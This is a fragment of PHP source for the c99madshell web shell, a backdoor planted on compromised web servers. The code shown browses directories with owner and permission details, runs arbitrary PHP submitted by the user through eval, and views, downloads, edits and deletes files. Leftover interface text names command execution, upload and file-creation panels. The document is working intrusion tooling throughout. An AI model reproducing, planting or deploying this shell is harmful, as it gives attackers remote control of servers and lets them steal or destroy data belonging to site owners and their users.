"; } if ($act == "ls") { if (count($ls_arr) > 0) {$list = $ls_arr;} else { $list = array(); if ($h = @opendir($d)) { while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} closedir($h); } else {} } if (count($list) == 0) {echo "
Can't open folder (".htmlspecialchars($d).")!
";} else { //Building array $objects = array(); $vd = "f"; //Viewing mode if ($vd == "f") { $objects["head"] = array(); $objects["folders"] = array(); $objects["links"] = array(); $objects["files"] = array(); foreach ($list as $v) { $o = @basename($v); $row = array(); if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} elseif (is_dir($v)) { if (@is_link($v)) {$type = "LINK";} else {$type = "DIR";} $row[] = $v; $row[] = $type; } elseif(@is_file($v)) {$row[] = $v; $row[] = @filesize($v);} $row[] = @filemtime($v); if (!$win) { $ow = @posix_getpwuid(@fileowner($v)); $gr = @posix_getgrgid(@filegroup($v)); $row[] = ($ow["name"]?$ow["name"]:@fileowner($v))."/".($gr["name"]?$gr["name"]:@filegroup($v)); } $row[] = @fileperms($v); if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} elseif (@is_link($v)) {$objects["links"][] = $row;} elseif (@is_dir($v)) {$objects["folders"][] = $row;} elseif (@is_file($v)) {$objects["files"][] = $row;} $i++; } $row = array(); $row[] = "Name"; $row[] = "Size"; $row[] = "Modify"; if (!$win) {$row[] = "Owner/Group";} $row[] = "Perms"; $row[] = "Action"; $parsesort = parsesort($sort); $sort = $parsesort[0].$parsesort[1]; $k = $parsesort[0]; if ($parsesort[1] != "a") {$parsesort[1] = "d";} $y = ""; $row[$k] .= $y; for($i=0;$i".$row[$i]."";} } $v = $parsesort[0]; usort($objects["folders"], "tabsort"); usort($objects["links"], "tabsort"); usort($objects["files"], "tabsort"); if ($parsesort[1] == "d") { $objects["folders"] = array_reverse($objects["folders"]); $objects["files"] = array_reverse($objects["files"]); } $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); $tab = array(); $tab["cols"] = array($row); $tab["head"] = array(); $tab["folders"] = array(); $tab["links"] = array(); $tab["files"] = array(); $i = 0; foreach ($objects as $a) { $v = $a[0]; $o = basename($v); $dir = dirname($v); if ($disp_fullpath) {$disppath = $v;} else {$disppath = $o;} $disppath = str2mini($disppath,60); $uo = urlencode($o); $ud = urlencode($dir); $uv = urlencode($v); $row = array(); if ($o == ".") { $row[] = "".$o.""; $row[] = "LINK"; } elseif ($o == "..") { $row[] = "".$o.""; $row[] = "LINK"; } elseif (is_dir($v)) { if (is_link($v)) { $disppath .= " => ".readlink($v); $type = "LINK"; $row[] = " [".$disppath."]"; } else { $type = "DIR"; $row[] = " [".$disppath."]"; } $row[] = $type; } elseif(is_file($v)) { $row[] = " ".$disppath.""; $row[] = view_size($a[1]); } $row[] = ''.@date("d.m.Y H:i:s",$a[2]).''; if (!$win) {$row[] = $a[3];} $row[] = " ".view_perms_color($v).""; if ($o == ".") {$checkbox = ""; $i--;} else {$checkbox = "";} if (@is_dir($v)){$row[] = $checkbox;} else {$row[] = "E D X ".$checkbox;} if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} elseif (@is_link($v)) {$tab["links"][] = $row;} elseif (@is_dir($v)) {$tab["folders"][] = $row;} elseif (@is_file($v)) {$tab["files"][] = $row;} $i++; } } //Compiling table $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); echo "
Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

"; foreach($table as $row) { echo " "; foreach($row as $v) {echo " ";} echo " "; } echo "
".$v."

  "; echo " 

"; echo ""; } } if ($act == "eval") { if (!empty($eval)) { echo "Result of execution this PHP-code:
"; $tmp = ob_get_contents(); $olddir = realpath("."); @chdir($d); if ($tmp) { ob_clean(); eval($eval); $ret = ob_get_contents(); $ret = convert_cyr_string($ret,"d","w"); ob_clean(); echo $tmp; if ($eval_txt) { $rows = count(explode(" ",$ret))+1; if ($rows < 10) {$rows = 10;} echo "
"; } else {echo $ret."
";} } else { if ($eval_txt) { echo "
"; } else {echo $ret;} } @chdir($olddir); } else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} echo "


 Display in text-area 
"; } if ($act == "f") { if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") { if (file_exists($d.$f)) {echo "
Permision denied (".htmlspecialchars($d.$f).")!
";} else {echo "
File does not exists (".htmlspecialchars($d.$f).")!
Create
";} } else { $arr = array( array("HTML","html"), array("TXT","txt"), array("CODE","code"), array("DOWNLOAD","download"), array("EDIT","edit"), array("DELETE","delete") ); $r = @file_get_contents($d.$f); echo "Viewing file:   ".$f." (".view_size(@filesize($d.$f)).")      ".view_perms_color($d.$f)."
"; foreach($arr as $t) { echo " ".$t[0].""; echo " |"; } echo "
"; if ($ft == "download") { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".filesize($d.$f)); header("Content-disposition: attachment; filename=\"".$f."\";"); echo($r); c99shexit(); } elseif ($ft == "txt") {echo "
".htmlspecialchars($r)."
";} elseif ($ft == "html") { if ($white) {@ob_clean();} echo $r; if ($white) {c99shexit();} } elseif ($ft == "code") { echo "
"; if (!empty($white)) {@ob_clean();} highlight_file($d.$f); if (!empty($white)) {c99shexit();} echo "
"; } elseif($ft== 'delete') { if(!fs_rmobj($d.$f)){ echo('Delete error'); } else { echo('Delete succes'); } } elseif ($ft == "edit") { if (!empty($submit)) { if(save_file($d.$f, $edit_text)) { echo('Saved!'); } else { echo('Can\'t write to file!'); } $r = $edit_text; } echo "
  
"; } } } ?>

:: Command execute ::

:: Enter ::
 
:: Select ::
 

:: Search ::
  - regexp 
:: Upload ::

:: Make Dir ::
 
:: Make File ::
 

:: Go Dir ::
 
:: Go File ::
 

--[ c99madshell v. EDITED BY MADNET ]--